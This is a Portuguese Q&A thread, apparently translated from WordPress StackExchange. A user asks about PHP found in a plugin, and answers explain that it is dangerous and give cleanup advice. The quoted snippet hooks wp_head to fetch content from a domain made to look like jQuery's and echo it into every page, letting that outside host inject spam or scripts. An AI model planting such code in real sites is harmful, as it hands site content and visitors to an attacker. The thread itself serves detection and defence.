it-swarm-pt.tech

Eu encontrei isso em um plugin. O que isso faz? é perigoso?

Eu encontrei isso em um plugin. O que isso faz? é perigoso?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_Host']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
17
Sofia Rose

Ele carrega um bloco de marcação contendo spam (eu pensei em postar um pouco da fonte, mas eu não quero anunciar o conteúdo de forma alguma) de um domínio que é um erro de ortografia do domínio - http://jquery.com/-- usado por jQuery, uma biblioteca Javascript respeitável e popular e uma que o WordPress inclui no Core. Eu acho que a ideia é parecer estar carregando essa biblioteca, quando na verdade carregando algo muito diferente.

E é de outras formas tentando parecer estar carregando jQuery. Observe o nome da variável $jquery.

Pode tentar carregar scripts maliciosos também. Eu não chequei. Eu iria definitivamente chamar isso de perigoso, especialmente porque o conteúdo dessa página pode mudar a qualquer momento que os controladores de domínio se sentirem assim.

Na melhor das hipóteses, isso vai danificar seu site, pois os mecanismos de pesquisa olham para baixo em sites que espalham spam.

Não use isso. Não faz nada benéfico para você ou para qualquer outra pessoa na web que não seja as pessoas que administram o site. Se você achou isso em um site respeitável, denuncie-o.

16
s_ha_dum

Sim, é um código perigoso, carregando conteúdo de um site de spam.

Você não nomeou o plug-in, mas se você encontrou este código depois que ele foi instalado em seu site, é possível que o código do plug-in não tenha sido desse desenvolvedor, mas foi invadido depois que foi instalado. Se este for o caso, você pode encontrar o código malicioso em mais do seu site do que apenas este plugin.

Verifique o código do plug-in baixado de onde você adquiriu o plug-in originalmente e veja se esse código malicioso estava lá originalmente. Caso contrário, seu site foi invadido. Se você determinar que, para ser o caso, leia este artigo do Codex .

7
Ben Miller